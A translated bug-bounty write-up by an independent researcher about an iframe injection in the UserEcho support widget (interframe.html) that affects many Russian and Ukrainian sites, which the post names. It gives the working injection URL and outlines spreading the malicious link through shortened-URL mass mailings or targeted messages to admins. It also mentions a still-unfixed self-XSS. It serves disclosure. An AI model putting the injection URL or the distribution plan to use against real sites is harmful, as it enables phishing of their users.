
Iframe injection and self-XSS on more than 20,000 sites in the Alexa rank UA / RU

I am an independent security researcher (securityz.net) and took first place in the PrivatBank bug bounty.

I decided to walk through the top of the Alexa rank and began looking for vulnerabilities on gismeteo.ua (20th place). There was a redirect to the Russian version (www.gismeteo.ru/soft/), and the technical support section caught my attention.



Technical support was hosted at gismeteo.userecho.com and loaded into gismeteo in an iframe:



https://gismeteo.userecho.com/s/interframe.html?url=https://gismeteo.userecho.com/widget/forum/6-/?lang=ru&referer=https://www.gismeteo.ru/soft/&xdm_e=https://www.gismeteo.ru&xdm_c=default4178&xdm_p=1 


Then a form appeared to create a ticket.


I tried to load my own website into the iframe via https://gismeteo.userecho.com/s/interframe.html?url=https://securityz.net, but it did not load. Then I realized that, in addition to the URL of the site to load, the variables lang, referer, xdm_e and others are also required.



 http://support.gismeteo.ru/s/interframe.html?url=https://securityz.net/?lang=ru&referer=https://www.gismeteo.ru/soft/&xdm_e=https://www.gismeteo.ru&xdm_c=default4178&xdm_p=1 


And my site was loaded in the frame.



Video:





It turned out that the widget's owner, userecho.com, uses the same API on all client sites for technical support; hence the conclusion that all of its clients are vulnerable to iframe injection.



We find a list of top clients at http://userecho.com/clients/?lang=en and see that many of the vulnerable clients are among the most visited sites:

- drugvokrug.ru (a social network with more than 5,000,000 users)
- fl.ru (the most popular freelance exchange in Russia)
- easypay.ua (one of the most visited payment systems in Ukraine)
- tankionline.com
- ivi.ru
- amiro.ru
- okko.tv
- insales.ru
- a-lab.ru
- scrapinghub.com
- iridiummobile.net and many others.



Almost all sites place the userecho widget on their own subdomain, for example ask.drugvokrug.ru, but some place it as a subdomain of userecho, e.g. kontur.userecho.com. Userecho clients can also be found with Google / Yandex dorks.



Attack vectors:





To spread a malicious link, you would first shorten it (goo.gl/GIYRUR), then:

  1. Mass-mail it to forums and email addresses.
  2. Deliberately target a specific user or admin using this vulnerability.


It would have been possible to send vulnerability reports to each vulnerable site, but the vulnerability would have been promptly fixed by the userecho developers and I would have received nothing from either the vulnerable sites or the widget developers.

Therefore, I decided to inform the plug-in developers about the finding right away.



01/09/2017 at 23:00: a bug report was sent to userecho.com support.

01/10/2017 at 00:10: the vulnerability was fixed and the vulnerable interframe.html file was deleted (comment from the developers: the interframe.html file is no longer available (deleted) and all widgets work without it, so everything works with the same API).

01/10/2017 at 02:14: the developers paid a reward of $100. Comment:

You must understand that we are not such a large company. Also, this is actually the first time we have decided to give someone a monetary reward.


I also found a self-XSS vulnerability in userecho support, which they are not going to fix; more than 20 thousand sites are vulnerable. Here is the article and PoC.



I barely managed to persuade the developers to fix the iframe injection:

We saw from the logs that you were playing with interframe.html and basically understood why and how it was used. It just was not clear how it could be used to any benefit.

Now that we understand the use cases and you have prompted us to fix it, we are ready to transfer you 100 USD.




+ I found another XSS vulnerability in this widget; no one is going to fix it and it is still present on 20,000+ sites.



To keep up with all my latest posts, follow me on Twitter at https://twitter.com/qiecew9w and on VK. I would be very happy to have new subscribers. :)

Good luck!

I recommend reading my next article: [BugBounty] Partial authentication bypass on vk.com

Source: https://habr.com/ru/post/319304/


